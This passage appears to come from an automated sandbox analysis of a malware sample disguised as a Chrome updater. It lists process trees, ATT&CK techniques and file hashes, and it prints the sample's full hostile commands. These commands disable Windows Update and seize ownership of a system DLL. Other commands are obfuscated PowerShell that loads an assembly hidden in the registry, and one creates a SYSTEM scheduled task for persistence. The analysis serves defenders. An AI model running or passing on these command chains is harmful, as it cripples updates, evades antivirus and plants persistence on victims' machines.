PID 764 wrote to memory of 532	764	cmd.exe	sc.exe
PID 268 wrote to memory of 1020	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1020	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1020	268	cmd.exe	powercfg.exe
PID 764 wrote to memory of 1924	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1924	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1924	764	cmd.exe	sc.exe
PID 764 wrote to memory of 112	764	cmd.exe	sc.exe
PID 764 wrote to memory of 112	764	cmd.exe	sc.exe
PID 764 wrote to memory of 112	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1556	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1556	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1556	764	cmd.exe	sc.exe
PID 764 wrote to memory of 1816	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1816	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1816	764	cmd.exe	reg.exe
PID 268 wrote to memory of 1072	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1072	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1072	268	cmd.exe	powercfg.exe
PID 764 wrote to memory of 1912	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1912	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1912	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1388	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1388	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1388	764	cmd.exe	reg.exe
PID 268 wrote to memory of 1068	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1068	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 1068	268	cmd.exe	powercfg.exe
PID 764 wrote to memory of 1260	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1260	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1260	764	cmd.exe	reg.exe
PID 764 wrote to memory of 584	764	cmd.exe	reg.exe
PID 764 wrote to memory of 584	764	cmd.exe	reg.exe
PID 764 wrote to memory of 584	764	cmd.exe	reg.exe
PID 268 wrote to memory of 856	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 856	268	cmd.exe	powercfg.exe
PID 268 wrote to memory of 856	268	cmd.exe	powercfg.exe
PID 764 wrote to memory of 452	764	cmd.exe	takeown.exe
PID 764 wrote to memory of 452	764	cmd.exe	takeown.exe
PID 764 wrote to memory of 452	764	cmd.exe	takeown.exe
PID 764 wrote to memory of 824	764	cmd.exe	icacls.exe
PID 764 wrote to memory of 824	764	cmd.exe	icacls.exe
PID 764 wrote to memory of 824	764	cmd.exe	icacls.exe
PID 764 wrote to memory of 1280	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1280	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1280	764	cmd.exe	reg.exe
PID 764 wrote to memory of 984	764	cmd.exe	reg.exe
PID 764 wrote to memory of 984	764	cmd.exe	reg.exe
PID 764 wrote to memory of 984	764	cmd.exe	reg.exe
PID 764 wrote to memory of 1660	764	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1828

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1960

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
- Modifies data under HKEY_USERS
PID:292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\taskeng.exe
taskeng.exe {9E461821-0614-41BD-842F-E4E0C24B0DE1} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:324

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:168380

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:168400

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:168564

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1920

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:168748

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:168836

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:168348

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:168588

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:168676

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1768

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:168476

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:168832

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:168888

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:168496

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1924

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:168632

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:168900

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:168604

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:1716

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:168784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:168356

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:1348

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1036

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:168444

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:168544

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:168576

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:168428

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:168472

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "ahqffhzbijamz"
5⤵
PID:168336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
- Drops file in System32 directory
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
3⤵
PID:168696

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8fc2c8c3-5926-4f7d-8b5c-db0e54dfc18d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{94ad35fc-6dcb-4f1a-b99b-613ee779ce6b}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:168460

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:848

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1268

C:\Users\Admin\AppData\Local\Temp\Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\Setup2.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAB2AHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdAB5AGsAIwA+AA=="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:336

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:532

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1924

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:112

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1556

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1816

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1912

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1388

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1260

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:584

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:452

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:824

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1280

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:984

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1660

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1764

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:304

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1676

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:552

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1804

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgByACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAdABlAG0AcAAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAZQBtAHAALgBlAHgAZQAnACkAIAA8ACMAcQB3AHUAIwA+AA=="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Users\Admin\AppData\Local\Temp\temp.exe
"C:\Users\Admin\AppData\Local\Temp\temp.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Users\Admin\AppData\Local\Temp\cmd.exe
"C:\Users\Admin\AppData\Local\Temp\cmd.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:168328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 166608
6⤵
- Loads dropped DLL
- Program crash
PID:168408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"
5⤵
PID:164652

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 5
6⤵
PID:168372

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:520

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:452

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1440

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1488

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1232

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "485958907-766256497-424201914-1389973767105906324412017678218444066971556702938"
1⤵
PID:1524

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1594856442-1593862860-507866125765907161677168209115057963019532011982113678461"
1⤵
PID:168468

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
4.5MB

MD5
7ede5e1864c423c59a1cb3bdcd7cc939

SHA1
f34f722ed04615441656ccef087e7b982ae09af9

SHA256
4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d

SHA512
47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
4.5MB

MD5
7ede5e1864c423c59a1cb3bdcd7cc939

SHA1
f34f722ed04615441656ccef087e7b982ae09af9

SHA256
4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d

SHA512
47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cmd.exe
Filesize
351KB

MD5
2c4214d0aa9bfd57e2669e99f8b72af6

SHA1
d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

SHA256
c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

SHA512
1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe
Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.exe
Filesize
7KB

MD5
f321da5881a6aaeb53da13d5c075406b

SHA1
979ed66205d2bad63fc016dc8c32cff6a2b6fc05

SHA256
a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

SHA512
c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
32e70c885b8d42529b982b2639a5d245

SHA1
1c6e3aa8e420a70ec571263e2a668626b893f027

